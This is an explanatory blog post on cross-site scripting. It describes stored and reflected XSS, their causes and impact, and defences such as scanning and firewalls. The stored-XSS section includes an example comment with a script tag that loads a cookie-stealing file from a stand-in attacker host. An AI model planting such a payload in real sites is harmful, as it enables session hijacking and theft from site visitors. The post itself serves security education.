Cross-site scripting
or XSS is one of the most dangerous and malicious yet most widespread and
common attacks that look to gain access to and control of the users’ browser by
using vulnerabilities in the application and thereby, gain access to their
confidential and sensitive information. So, what exactly is cross-site scripting?
The attackers use vulnerabilities in these legitimate
websites or web applications to inject malicious scripts/ codes that get
executed when the unsuspecting victim (user) loads the website. The main
difference between XSS attacks and other web-attack vectors is that this
client-side code injection attack is not aimed at the web application, but at
the users of vulnerable applications.
XSS attacks are generally broken down into two types:
Stored/ Persistent XSS and Reflected XSS
Stored XSS is considered the most malicious and damaging
type of XSS attacks. Here, the malicious payload (injected malicious scripts)
is injected directly into the website/web application by exploiting its
vulnerabilities, and these injected scripts are saved onto the web browser. So,
every time the victim visits the website, the script gets activated. The
session cookie of each visitor is sent to the attacker. This is why stored XSS
is also known as persistent XSS.
Example: Upon snooping around different websites, a
cyber-attacker finds vulnerabilities in the comment section of a specific
website which allows users to embed HTML tags in it. So, the attacker embeds a
malicious script in the comment section that reads something like Hi there! I
am John and I loved this product. You can find my detailed review here.
<script src=”http://hackersite.com/authstealer.js”> </script>. So,
whenever any user visits the page, whether or not they go to the comments
section, the malicious payload is triggered, and that user’s session cookies
stolen by the attacker. Using this stolen cookie, the attacker can gain access
to personal and confidential information of the user such as bank account
details, credit card information, etc.
Reflected XSS is where the malicious payload is embedded
into a link and activated only when the user clicks on the link. Here, the
malicious payload is not stored but only displayed on the web page in the form
of a URL or POST data.
As mentioned earlier, Stored XSS is the most damaging type
of XSS attack. There are three major reasons for this:
1.It is persistent, i.e. it keeps getting executed every time
the user visits the website.
2.It is invisible to the browsers’ XSS filters, unlike
reflected XSS which can be detected by in-built XSS filters of most browsers
like Chrome, Edge, etc.
3.It can be triggered off just by visiting the website, unlike
reflected XSS attacks where clicking on the malicious link is required. This
simply increases the reach of a stored XSS attack.
As mentioned earlier, the main reason for XSS attacks is the
presence of vulnerabilities and gaps in the web application or website that
attackers can identify upon snooping around and use it as a medium to inject
the malicious payload.
The gaps could exist because of permissions on the page for
unencoded or unvalidated user inputs, and this mostly happens on sites that
allow comments, feedback, user posts, etc. such as blogs, social media
websites, video and content sharing websites, etc. The vulnerability could also
permeate from the legacy or old, redundant VBScript, Active X, JavaScript,
Flash Script, etc. that are used in the web application.
Impact
The impact and severity of successful XSS attacks vary
widely. XSS attacks could result in session hijacking, stolen tokens and
session cookies, CSRF (cross-site request forgery) attacks. These, in turn,
lead to the user accounts being compromised and possibly breached into. The
attacker then is able to use the stolen cookies to impersonate valid users. In
cases where the valid user has administrative rights in the application, the
attacker can use the privileges to even alter pages or execute codes on the server
side.
Even though the XSS attacks are aimed at the users of web
applications, there are heavy losses to the organization as well. How? There
are obvious monetary losses. But what costs organizations dearly is the loss of
customers, brand image and reputation.
Many browsers have inbuilt filters to prevent XSS attacks
but one cannot rely only on the Client side capabilities to prevent
attacks. As a website owner, it is
imperative for the business to detect and fix them. Moreover, XSS Filters present in most web
browsers do not filter all variants of XSS attacks. Continuous detection and
scanning of your applications along with Web application Firewall (WAF) are one
of the most effective and widely used solutions to secure web applications and
its users from XSS attacks.
No comments:
Post a Comment